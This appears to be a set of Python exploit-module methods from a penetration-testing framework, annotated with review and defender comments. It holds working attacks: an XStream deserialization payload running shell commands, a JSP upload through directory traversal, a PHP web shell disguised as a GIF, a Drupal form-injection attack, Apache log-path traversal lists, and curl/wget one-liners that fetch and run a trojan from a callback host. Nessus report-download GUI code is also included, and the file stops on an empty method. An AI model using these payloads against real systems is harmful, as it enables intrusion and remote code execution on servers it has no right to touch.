def run(self):
    """Entry point: POST a crafted XStream XML document carrying `self.cmd` to basepath + /ws/rest/v1/d2.

    Without a "cmd" argument the exploit builds a trojan (maketrojan), serves it from its own
    HTTP server (startHTTPServer, started on a thread) and sends a shell one-liner that
    downloads and runs it; otherwise the given command is sent and the response is logged.
    Returns 1 unconditionally: the HTTP response is never checked for success.
    """
    # Check arguments
    self.host = self.target.interface
    self.port = int(self.argsDict.get("port", self.port))
    self.sslport = int(self.argsDict.get("sslport", self.sslport))
    self.https = int(self.argsDict.get("https", self.https))
    # NOTE(review): https/sslport are parsed but never applied in this method (the
    # Drupal-style run() in this file switches protocol and port on https); self.protocol
    # is read below, so it must be set elsewhere -- confirm.
    self.basepath = self.argsDict.get("basepath", self.basepath)
    self.cmd = self.argsDict.get("cmd", self.cmd)
    if (self.argsDict.get("cmd", self.cmd) == ""):
        self.maketrojan()
        self.TROJANMODE = 1
        # Fetch-and-run one-liner; trojanname is whatever maketrojan() produced.
        self.cmd = "rm -f /tmp/" + self.trojanname + "; /usr/bin/curl -o /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; /bin/chmod 777 /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
        thread.start_new_thread(self.startHTTPServer, ())
    else:
        # Redundant: self.cmd was already assigned the same value above.
        self.cmd = self.argsDict.get("cmd", self.cmd)
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Attacking %s:%d" % (self.host, self.port))
    ua = spkproxy.UserAgent("", exploit=self)
    # The fixed (2011-era Firefox) User-Agent plus a text/xml POST to this endpoint are
    # stable artifacts for detection rules.
    ua.addHeader(
        "User-Agent",
        "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
    )
    ua.addHeader("Content-Type", "text/xml")
    # Exploitation
    # XML body: a java.lang.ProcessBuilder invoking "/bin/sh -c <cmd>" wrapped in the
    # object graph below. self.cmd is substituted raw, so a command containing '<' or '&'
    # would produce malformed XML. For defenders, a request body that names
    # java.lang.ProcessBuilder is a high-confidence signature on its own.
    params = """<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>/bin/sh</string> <string>-c</string> <string>%s</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> 
<name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry>""" % self.cmd
    url = "/ws/rest/v1/d2"
    mainurl = "%s://%s:%d/%s%s" % (self.protocol, self.host, self.port, self.basepath, url)
    data = ua.POST(mainurl, params)
    if self.TROJANMODE == 0:
        # Presumably the command output precedes the server's HTML error page in the
        # response; only the part before "<!DOCTYPE html>" is logged.
        self.log('[D2] %s' % (data.split('<!DOCTYPE html>')[0]))
    return 1
def upload_file(self):
    """Upload the JSP in self.filename through /mapviewer/addmapdata and then request it.

    CALLBACK_IP / CALLBACK_PORT placeholders in the file are replaced with the callback
    address, and a GeoJSON FeatureCollection is prepended to the JSP text before upload.
    Side effects: sets self.protocol and, when https is enabled, overwrites self.port with
    self.sslport. Returns 1 unconditionally; neither HTTP response is inspected.
    """
    # Open JSP file
    # NOTE(review): not closed if read() raises; a with-block would be safer.
    f = open(self.filename, "r")
    fdata = f.read()
    f.close()
    fdata = fdata.replace("CALLBACK_IP", self.callback.ip)
    fdata = fdata.replace("CALLBACK_PORT", str(self.callback.port))
    # Local name shadows the json module (harmless here, but easy to misread).
    json = """ { "type": "FeatureCollection", "features": [ { "type": "Feature", "geometry": { "type": "LineString", "coordinates": [ [ 1.061553955078125, 48.3416461723746 ], [ 5.719757080078125, 48.2246726495652 ], [ 3.434600830078125, 45.21300355599396 ], [ 1.061553955078125, 48.3416461723746 ] ] }, "properties": {} } ] } """
    fdata = json+fdata
    if self.https == 0:
        self.protocol = "http"
    else:
        self.protocol = "https"
        self.port = self.sslport
    ua = spkproxy.UserAgent("", exploit=self)
    # Upload JSP file
    # Multipart body with a hard-coded boundary; the "fileName" field is
    # "../../../../d2.jsp", i.e. a directory-traversal file name. For defenders, the fixed
    # boundary together with traversal sequences in fileName is an easy WAF/IDS match, and
    # the server-side fix is to reject path separators in uploaded file names.
    params = '-----------------363752669374944\r\nContent-Disposition: form-data; name="fileName"\r\n\r\n../../../../d2.jsp\r\n-----------------363752669374944\r\nContent-Disposition: form-data; name="layerFile"\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n\r\n%s\r\n-----------------363752669374944--\r\n'%(len(fdata), fdata)
    url = '/mapviewer/addmapdata'
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    ua.addHeader("Content-Type", "multipart/form-data; boundary=---------------363752669374944")
    ua.addHeader("User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1")
    data = ua.POST(mainurl, params)
    # Execute uploaded JSP file
    # The upload response is not checked before the follow-up GET.
    url = "/mapviewer/d2.jsp"
    mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
    data = ua.GET(mainurl)
    return 1
def __init__(self):
    """Initialise the exploit object.

    Sets up a placeholder UserAgent, an empty name, webserverport, the `shell` payload
    string and the `log_paths` candidate list. `shell` starts with the ASCII bytes
    "GIF89a" (0x47 0x49 0x46 0x38 0x39 0x61), is followed by binary bytes, then a PHP
    block that calls passthru()/eval() on base64-decoded SERVER_INFO / SERVER_INFO2
    request parameters, then more bytes. Upload filters that only check the magic
    bytes or an image extension would accept such a file; scanning upload bodies for
    "<?php" regardless of declared type is the reliable server-side check.
    """
    canvasexploit.__init__(self)
    #hostname="http://google.com"
    #elf.hostname=hostname
    self.ua = spkproxy.UserAgent("") #placeholder
    self.name = ""
    #self.ssl=""
    self.webserverport = 0 #set to non-zero to make it an RFI exploit
    # Image-header bytes, PHP stub, trailing bytes (see class docstring).
    self.shell=chr(0x47)+chr(0x49)+chr(0x46)+chr(0x38)+chr(0x39)+chr(0x61)+\
    chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0xf7)+chr(0x00)+\
    chr(0x00)+chr(0xa4)+chr(0xb6)+chr(0xa4)+chr(0x16)+chr(0x00)+\
    chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x4c)+chr(0x15)+chr(0x00)+\
    chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x69)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x6e)+chr(0x62)+chr(0x00)+\
    chr(0x00)+chr(0x15)+chr(0x00)+chr(0x67)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x34)+chr(0x00)+chr(0x75)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x61)+chr(0xc0)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x89)+chr(0x00)+chr(0x00)+chr(0x1c)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0xa9)+chr(0x00)+chr(0x00)+chr(0x20)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x56)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+\
    """<?php error_reporting(0); ini_set('max_execution_time',0); print 'startz'; passthru(base64_decode($_REQUEST[SERVER_INFO])); eval(base64_decode($_REQUEST[SERVER_INFO2])); print 'endz'; exit; ?>"""+\
    chr(0x38)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+\
    chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x98)+chr(0x01)+chr(0x00)+\
    chr(0xcc)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x58)+chr(0x00)+chr(0x10)+chr(0xe6)+chr(0x00)+\
    chr(0x04)+chr(0x12)+chr(0x00)+chr(0x10)+chr(0x00)+chr(0x00)+\
    chr(0x04)+chr(0x05)+chr(0x00)+chr(0x01)+chr(0x90)+chr(0x00)+\
    chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0xc8)+chr(0x00)+chr(0x10)+chr(0xd5)+chr(0x00)+\
    chr(0xe8)+chr(0xf5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0xff)+chr(0x00)+chr(0x13)+chr(0xff)+chr(0x00)+\
    chr(0x6c)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
    chr(0x74)+chr(0x6a)+chr(0x00)+chr(0x03)+chr(0x16)+chr(0x00)+\
    chr(0x00)+chr(0xf4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0xc4)+chr(0x00)+chr(0x30)+chr(0x1e)+chr(0x00)+\
    chr(0x75)+chr(0xe5)+chr(0x00)+chr(0x15)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0xdc)+chr(0x00)+chr(0x00)+\
    chr(0xe7)+chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x70)+chr(0x00)+chr(0x01)+chr(0x59)+chr(0x00)+\
    chr(0x00)+chr(0x18)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x04)+chr(0x00)+chr(0x88)+chr(0x01)+chr(0x00)+\
    chr(0xe8)+chr(0x05)+chr(0x00)+chr(0x12)+chr(0x01)+chr(0x00)+\
    chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x04)+chr(0xe3)+chr(0x00)+\
    chr(0x42)+chr(0x12)+chr(0x00)+chr(0x6e)+chr(0x00)+chr(0x00)+\
    chr(0x74)+chr(0x7e)+chr(0x00)+chr(0x30)+chr(0x00)+chr(0x00)+\
    chr(0x87)+chr(0x00)+chr(0x00)+chr(0x6e)+chr(0xc0)+chr(0x00)+\
    chr(0x74)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
    chr(0xff)+chr(0x00)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
    chr(0xff)+chr(0xff)+chr(0x00)+chr(0xd6)+chr(0xff)+chr(0x00)+\
    chr(0x32)+chr(0xff)+chr(0x00)+chr(0x6e)+chr(0xff)+chr(0x00)+\
    chr(0x74)+chr(0xff)+chr(0x00)+chr(0x6c)+chr(0xff)+chr(0x00)+\
    chr(0x5b)+chr(0xff)+chr(0x00)+chr(0xe5)+chr(0xff)+chr(0x00)+\
    chr(0x77)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
    chr(0x15)+chr(0x00)+chr(0x00)+chr(0x53)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x07)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x6b)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x58)+chr(0x00)+chr(0x00)+chr(0x03)+chr(0x00)+\
    chr(0xf0)+chr(0x00)+chr(0x00)+chr(0x15)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x06)+chr(0x00)+chr(0x00)+chr(0xf6)+chr(0x00)+\
    chr(0x00)+chr(0xe4)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0x0f)+chr(0x00)+chr(0x00)+chr(0x1e)+chr(0x00)+\
    chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0xf8)+chr(0x74)+chr(0x00)+chr(0x62)+chr(0xe7)+\
    chr(0x00)+chr(0x01)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0xc8)+chr(0x68)+chr(0x00)+chr(0x28)+\
    chr(0x32)+chr(0x15)+chr(0xe5)+chr(0xe6)+chr(0x00)+chr(0x77)+\
    chr(0x77)+chr(0xa4)+chr(0x00)+chr(0xff)+chr(0xe5)+chr(0x00)+\
    chr(0xff)+chr(0x12)+chr(0x00)+chr(0xff)+chr(0x00)+chr(0x00)+\
    chr(0xff)+chr(0x00)+chr(0x00)+chr(0x6c)+chr(0x00)+chr(0x00)+\
    chr(0x5b)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
    chr(0x77)+chr(0xfc)+chr(0xf8)+chr(0x36)+chr(0xf7)+chr(0x62)+\
    chr(0x00)+chr(0x12)+chr(0x15)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x05)+chr(0x00)+chr(0x36)+chr(0x90)+chr(0x01)+\
    chr(0x00)+chr(0xf6)+chr(0x00)+chr(0x00)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0xc8)+chr(0x04)+chr(0xd8)+chr(0xd5)+chr(0x29)+\
    chr(0xed)+chr(0xf5)+chr(0xe5)+chr(0x12)+chr(0x77)+chr(0x77)+\
    chr(0x00)+chr(0xff)+chr(0x94)+chr(0xff)+chr(0xff)+chr(0xe7)+\
    chr(0xff)+chr(0xff)+chr(0x12)+chr(0xff)+chr(0xff)+chr(0x00)+\
    chr(0xff)+chr(0x6a)+chr(0x64)+chr(0x00)+chr(0x16)+chr(0x2f)+\
    chr(0x00)+chr(0xf4)+chr(0xe6)+chr(0x00)+chr(0x77)+chr(0x77)+\
    chr(0x00)+chr(0xe0)+chr(0x00)+chr(0x9c)+chr(0x18)+chr(0x00)+\
    chr(0xe8)+chr(0xe5)+chr(0x00)+chr(0x12)+chr(0x77)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0xff)+chr(0x4e)+chr(0x00)+chr(0xff)+\
    chr(0x21)+chr(0x15)+chr(0xff)+chr(0x4c)+chr(0x00)+chr(0xff)+\
    chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x7c)+chr(0x00)+chr(0x10)+\
    chr(0xe8)+chr(0x00)+chr(0xe5)+chr(0x12)+chr(0x00)+chr(0x77)+\
    chr(0x00)+chr(0xf8)+chr(0x00)+chr(0x7b)+chr(0x62)+chr(0x00)+\
    chr(0xe0)+chr(0x15)+chr(0x00)+chr(0x4e)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x98)+chr(0xb0)+chr(0x01)+chr(0xe8)+\
    chr(0xe8)+chr(0x00)+chr(0x12)+chr(0x12)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x64)+chr(0x98)+chr(0x6f)+chr(0x2f)+chr(0x10)+\
    chr(0x10)+chr(0xe6)+chr(0xe5)+chr(0xe5)+chr(0x77)+chr(0x77)+\
    chr(0x77)+chr(0x00)+chr(0x10)+chr(0x52)+chr(0x00)+chr(0xe4)+\
    chr(0xe9)+chr(0x00)+chr(0x4e)+chr(0x12)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x61)+chr(0x20)+chr(0xc8)+chr(0x00)+chr(0x02)+\
    chr(0xff)+chr(0x6c)+chr(0x4f)+chr(0xff)+chr(0x00)+chr(0x00)+\
    chr(0x7f)+chr(0x69)+chr(0x00)+chr(0x1c)+chr(0x00)+chr(0x01)+\
    chr(0xe9)+chr(0x61)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x29)+chr(0x94)+chr(0x00)+chr(0x00)+chr(0xe7)+\
    chr(0x00)+chr(0x00)+chr(0x12)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x6f)+chr(0x00)+chr(0x01)+\
    chr(0x10)+chr(0x00)+chr(0x00)+chr(0xe5)+chr(0x00)+chr(0x00)+\
    chr(0x77)+chr(0x00)+chr(0xa0)+chr(0x00)+chr(0x00)+chr(0x3a)+\
    chr(0x00)+chr(0x00)+chr(0x50)+chr(0x00)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x30)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x00)+chr(0x69)+\
    chr(0x00)+chr(0x00)+chr(0x61)+chr(0x60)+chr(0x00)+chr(0x74)+\
    chr(0xf1)+chr(0x00)+chr(0x74)+chr(0x15)+chr(0x00)+chr(0x69)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0xf0)+chr(0x00)+chr(0x00)+\
    chr(0xaa)+chr(0x00)+chr(0x02)+chr(0x47)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x21)+chr(0xf9)+chr(0x04)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x00)+chr(0x2c)+chr(0x00)+chr(0x00)+\
    chr(0x00)+chr(0x00)+chr(0x01)+chr(0x00)+chr(0x01)+chr(0x00)+\
    chr(0x07)+chr(0x08)+chr(0x04)+chr(0x00)+chr(0x01)+chr(0x04)+\
    chr(0x04)+chr(0x00)+chr(0x3b)+chr(0x00)
    # Candidate relative paths to common Apache access/error log locations, with varying
    # numbers of "../" components. How they are consumed is not visible in this method.
    # For defenders: log files reachable through a web-root-relative path are a sign the
    # application resolves user-supplied paths without normalisation.
    self.log_paths = [
        "../../../../../var/log/apache2/access.log",
        "../../../../../var/log/apache2/error.log",
        "../../../../../var/log/httpd/access_log",
        "../../../../../var/log/httpd/error_log",
        "../apache/logs/error.log",
        "../apache/logs/access.log",
        "../../apache/logs/error.log",
        "../../apache/logs/access.log",
        "../../../apache/logs/error.log",
        "../../../apache/logs/access.log",
        "../../../../apache/logs/error.log",
        "../../../../apache/logs/access.log",
        "../../../../../apache/logs/error.log",
        "../../../../../apache/logs/access.log",
        "../logs/error.log",
        "../logs/access.log",
        "../../logs/error.log",
        "../../logs/access.log",
        "../../../logs/error.log",
        "../../../logs/access.log",
        "../../../../logs/error.log",
        "../../../../logs/access.log",
        "../../../../../logs/error.log",
        "../../../../../logs/access.log",
        "../../../../../etc/httpd/logs/access_log",
        "../../../../../etc/httpd/logs/access.log",
        "../../../../../etc/httpd/logs/error_log",
        "../../../../../etc/httpd/logs/error.log",
        "../../../../../var/www/logs/access_log",
        "../../../../../var/www/logs/access.log",
        "../../../../../usr/local/apache/logs/access_log",
        "../../../../../usr/local/apache/logs/access.log",
        "../../../../../var/log/apache/access_log",
        "../../../../../var/log/apache/access.log",
        "../../../../../var/log/access_log",
        "../../../../../var/www/logs/error_log",
        "../../../../../var/www/logs/error.log",
        "../../../../../usr/local/apache/logs/error_log",
        "../../../../../usr/local/apache/logs/error.log",
        "../../../../../var/log/apache/error_log",
        "../../../../../var/log/apache/error.log",
        "../../../../../var/log/access_log",
        "../../../../../var/log/error_log",
        "../../../../../../var/log/apache2/error.log"
    ]
def start(self, widget):
    """GTK "start" handler: log in to the Nessus server named in the dialog and list its scans.

    Reads host, port, login and password from the dialog widgets (each must be non-empty),
    POSTs them as JSON to self.loginurl, keeps the returned token, then GETs self.scanurl
    and fills treestore_3 with (name, creation date, id) rows. Returns None; every failure
    is logged rather than raised. `widget` is the signal source and is unused.
    """
    self.treestore_3.clear()
    hostentry = self.wTree2.get_widget("selectedhost")
    self.qhost = hostentry.get_text()
    if self.qhost == "":
        self.log("[D2 LOG] ERROR: Nessus Server IP is empty")
        return
    portentry = self.wTree2.get_widget("serverport")
    # Kept as a string: it is only ever concatenated into the URL, never validated as a number.
    self.port = portentry.get_text()
    if self.port == "":
        self.log("[D2 LOG] ERROR: Nessus Server port is empty")
        return
    loginentry = self.wTree2.get_widget("login")
    self.login = loginentry.get_text()
    if self.login == "":
        self.log("[D2 LOG] ERROR: Nessus login is empty")
        return
    pwdentry = self.wTree2.get_widget("password")
    # Retained on the instance (download() re-authenticates with it).
    self.password = pwdentry.get_text()
    if self.password == "":
        self.log("[D2 LOG] ERROR: Nessus password is empty")
        return
    postdata = {
        'username': self.login,
        'password': self.password,
    }
    urldata = json.dumps(postdata)
    mainurl = "https://" + self.qhost + ":" + self.port
    headers = [("Content-Type", "application/json")]
    # Login and get token
    UA = spkproxy.UserAgent(mainurl, exploit=self)
    data = UA.POST(self.loginurl, data=urldata, extraheaders=headers)
    # NOTE(review): json.loads raises ValueError on a non-JSON response (e.g. an HTML
    # error page); that is not caught here or below.
    response = json.loads(data)
    if "token" not in response:
        self.log("[D2 LOG] Nessus ACCESS DENIED")
        return
    self.token = response["token"]
    UA.addHeader("X-Cookie", "token=%s" % self.token)
    # Get scan list
    data = UA.GET(self.scanurl)
    response = json.loads(data)
    # Download scan list and update treeview
    if "scans" not in response:
        self.log("[D2 LOG] No scan available")
        return
    for scan in response["scans"]:
        # creation_date is treated as a Unix timestamp and rendered in UTC.
        self.treestore_3.append(None, [
            scan["name"],
            time.strftime("%a, %d %b %Y %H:%M:%S", time.gmtime(int(scan["creation_date"]))),
            scan["id"]
        ])
def run(self):
    """Entry point: inject `self.cmd` through the Drupal password-reset form and read the result.

    Without a "cmd" argument a trojan is generated (maketrojan), served from the exploit's own
    HTTP server, and a wget/chmod/execute one-liner is used instead. The first POST goes to
    ?q=user/password with `name[#post_render][]=passthru` style parameters and must yield a
    form_build_id; the second POST to ?q=file/ajax/name/#default_value/<form_build_id>
    triggers the render. Returns 0 if no form_build_id was found, otherwise 1.
    """
    # Check arguments
    self.host = self.target.interface
    self.port = int(self.argsDict.get("port", self.port))
    self.sslport = int(self.argsDict.get("sslport", self.sslport))
    self.https = int(self.argsDict.get("https", self.https))
    self.basepath = self.argsDict.get("basepath", self.basepath)
    self.cmd = self.argsDict.get("cmd", self.cmd)
    if (self.argsDict.get("cmd", self.cmd) == ""):
        self.TROJANMODE = 1
        self.maketrojan()
        self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname
        self.cmd += "&& chmod 777 /tmp/" + self.trojanname
        self.cmd += "&& /tmp/" + self.trojanname
        thread.start_new_thread(self.startHTTPServer, ())
    else:
        # Redundant: same value was assigned above.
        self.cmd = self.argsDict.get("cmd", self.cmd)
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Attacking %s:%d" % (self.host, self.port))
    if self.https == 0:
        self.protocol = "http"
    else:
        self.protocol = "https"
        self.port = self.sslport
    ua = spkproxy.UserAgent("", exploit=self)
    # The command is URL-quoted into the query string, not into the POST body. For
    # defenders: "name[%23post_render][]" / "name[%23markup]" in a request to
    # q=user/password is the canonical signature for this attack and is easy to block.
    url = "/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]="
    mainurl = "%s://%s:%d/%s%s%s" % (self.protocol, self.host, self.port, self.basepath, url, urllib.quote(self.cmd))
    params = urllib.urlencode({
        '_triggering_element_name': 'name',
        'form_id': 'user_pass'
    })
    data = ua.POST(mainurl, params)
    m = re.search('name="form_build_id" value="([^"]+)"', data)
    if m is None:
        self.log('[D2] form_build_id not found')
        return 0
    form_build_id = m.group(1)
    url = "/?q=file/ajax/name/%23default_value/"
    mainurl = "%s://%s:%d/%s%s%s" % (self.protocol, self.host, self.port, self.basepath, url, form_build_id)
    params = urllib.urlencode({'form_build_id': form_build_id})
    data = ua.POST(mainurl, params)
    if self.TROJANMODE == 0:
        # Everything before the AJAX "settings" command array is taken as command output;
        # the raw response is logged when that marker is absent.
        m = re.search('(.+?)\\[\\{"command":"settings","settings"', data, re.DOTALL)
        if m is not None:
            self.log('[D2] %s' % m.group(1).strip())
        else:
            self.log(data)
    return 1
def download(self, widget):
    """GTK handler: show the scan-selection dialog, then download each selected Nessus report.

    Builds the dialog from simple2.glade, wires its signals to start/activatedel/
    deselectall/selectall, and on OK re-logs-in once per selected reference with a
    form-encoded POST to self.loginurl, POSTs the reference to self.reporturl and writes
    the response under exploitpath + "reports/". Written file names are appended to
    self.ReportFiles and treestore_2. Returns None. `widget` is unused.
    """
    self.SelectedScan = []
    column_names = ['Name', 'Date', 'Reference']
    gladefile = self.exploitpath + "simple2.glade"
    self.wTree2 = gtk.glade.XML(gladefile)
    dic = {"on_start_clicked" : self.start,
           "on_delreport_toggled" : self.activatedel,
           "on_deselectall_clicked" : self.deselectall,
           "on_selectall_clicked" : self.selectall}
    self.wTree2.signal_autoconnect(dic)
    self.loaddlg = self.wTree2.get_widget("exploit_dialog")
    # Best-effort icon; a bare except also hides unrelated errors (KeyboardInterrupt included).
    try:
        self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
    except:
        pass
    # Init reports treeview
    self.treeview_3 = self.wTree2.get_widget("mytree")
    self.treestore_3 = gtk.TreeStore(str, str, str)
    self.treeview_3.set_show_expanders(False)
    self.treeview_3.set_model(self.treestore_3)
    self.treeselection = self.treeview_3.get_selection()
    self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)
    column = [None] * len(column_names)
    column[0] = gtk.TreeViewColumn(column_names[0], gtk.CellRendererText(), text=0)
    column[0].set_resizable(True)
    column[0].set_sort_column_id(0)
    column[1] = gtk.TreeViewColumn(column_names[1], gtk.CellRendererText(), text=1)
    column[1].set_resizable(True)
    column[1].set_sort_column_id(1)
    column[2] = gtk.TreeViewColumn(column_names[2], gtk.CellRendererText(), text=2)
    column[2].set_resizable(True)
    column[2].set_sort_column_id(2)
    self.treeview_3.append_column(column[0])
    self.treeview_3.append_column(column[1])
    self.treeview_3.append_column(column[2])
    # Start downloader dialog
    result = self.loaddlg.run()
    if (result == gtk.RESPONSE_OK):
        if (self.treeselection.count_selected_rows() > 0):
            model, paths = self.treeselection.get_selected_rows()
            for p in paths:
                iter = self.treestore_3.get_iter(p)  # shadows the builtin iter()
                tmpRef = model.get_value(iter, 2)  # column 2 = scan id from start()
                self.SelectedScan.append(tmpRef)
            for ref in self.SelectedScan:
                # NOTE(review): this login is form-encoded ('login'/'password'/'submit') while
                # start() sends JSON ('username'/'password') to the same self.loginurl and then
                # uses an X-Cookie token; the two paths target different API styles -- confirm
                # which one the server actually accepts.
                postdata = { 'login': self.login, 'password': self.password, 'submit': 'submit' }
                urldata = urllib.urlencode(postdata)
                mainurl = "https://" + self.qhost + ":" + self.port
                UA = spkproxy.UserAgent(mainurl, exploit=self)
                UA.POST(self.loginurl, data=urldata)
                postdata = { 'report': ref, 'submit': 'submit' }
                urldata = urllib.urlencode(postdata)
                data = UA.POST(self.reporturl, data=urldata)
                if "you are not authorized to perform this request" in data.lower():
                    self.log("[D2 LOG] Nessus ACCESS DENIED")
                    continue
                if not os.path.exists(self.exploitpath + "reports/"):
                    os.mkdir(self.exploitpath + "reports/")
                # ref comes from the server's scan list; only "/" is replaced before it is
                # used as a file name.
                filename = self.exploitpath + "reports/" + ref.replace("/", "_")
                f = open(filename, "w")
                f.write(data)
                f.close()
                self.ReportFiles.append(filename);
                self.treestore_2.append(None, [filename])
        else:
            self.log("[D2 LOG] - No Nessus report selected")
    self.loaddlg.destroy()
def run(self):
